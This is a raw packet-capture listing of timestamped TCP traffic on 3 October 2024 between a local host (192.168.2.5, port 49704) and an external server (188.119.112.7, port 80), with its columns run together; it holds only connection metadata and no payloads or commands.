                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.856381893 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.856913090 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.856991053 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857006073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857074976 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857192993 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857208967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857224941 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857248068 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857274055 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857738018 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857860088 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857880116 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857907057 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.857997894 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858012915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858028889 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858052015 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858275890 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858505011 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858598948 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858614922 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858666897 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858728886 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.858778954 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859044075 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859119892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859134912 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859163046 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859338045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859353065 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859369040 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859390974 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859400034 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.859416962 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.890722990 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.890851974 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.890886068 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.933964014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934021950 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934036016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934087992 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934103012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934118986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934324026 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934329033 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934324026 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934348106 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934362888 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934416056 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934416056 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934581995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934597969 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934653997 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934801102 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934817076 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934832096 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934845924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934860945 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934876919 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934889078 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934914112 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.934931040 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935276031 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935291052 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935441971 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935456991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935472012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935487032 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935501099 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935497046 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935518980 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935524940 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935524940 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.935575008 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936031103 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936045885 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936060905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936075926 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936089993 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936100006 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936105013 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936120987 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936120987 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936135054 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936151981 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936166048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936204910 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936846018 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936863899 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936878920 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936893940 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936909914 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936923981 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936924934 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.936968088 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937360048 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937375069 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937390089 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937405109 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937418938 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937424898 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937433958 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937448978 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937449932 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937464952 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937482119 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937484980 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937495947 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937503099 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.937537909 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938203096 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938221931 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938235998 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938251019 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938265085 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938280106 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938297987 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.938342094 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939405918 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939471006 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939479113 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939492941 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939541101 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939618111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939635038 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939651012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939666986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939688921 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939717054 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939907074 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939924002 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939939976 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.939990997 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940192938 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940208912 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940226078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940241098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940244913 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940256119 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940269947 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940284014 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940289021 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940304995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940310955 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940325022 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940332890 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940371037 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940742016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940843105 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940860033 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940917015 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.940993071 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941009045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941023111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941040039 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941041946 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941076994 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941308022 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941324949 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941339016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941354036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941371918 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941397905 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941560030 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941574097 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941582918 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941597939 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941636086 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941658974 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941952944 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941968918 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941983938 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.941999912 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942012072 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942014933 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942030907 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942040920 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942047119 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942061901 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942070961 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942078114 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942090988 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942138910 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942504883 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942523003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942538977 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942554951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942568064 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942570925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942588091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942605019 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942609072 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.942632914 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.991285086 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.090121031 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.230822086 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.230873108 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.230921030 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.230945110 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.230978966 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231014967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231051922 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231354952 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231409073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231451988 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231462002 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231487036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231520891 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231554031 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231570005 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231589079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231600046 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231631041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231663942 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231698036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231709957 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231734991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.231741905 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232121944 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232279062 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232311964 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232345104 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232378960 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232410908 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232443094 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232460022 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232476950 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232500076 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232510090 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232542992 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.232563019 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233133078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233165979 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233196020 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233241081 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233247995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233263969 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233280897 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233314991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233335972 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233349085 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233381033 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233413935 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233434916 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233447075 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.233463049 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234117985 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234152079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234184027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234215021 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234216928 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234245062 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234250069 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234283924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234317064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234337091 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234349966 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234371901 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234385967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234417915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.234469891 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235090971 CEST8049704188.119.112.7192.168.2.5
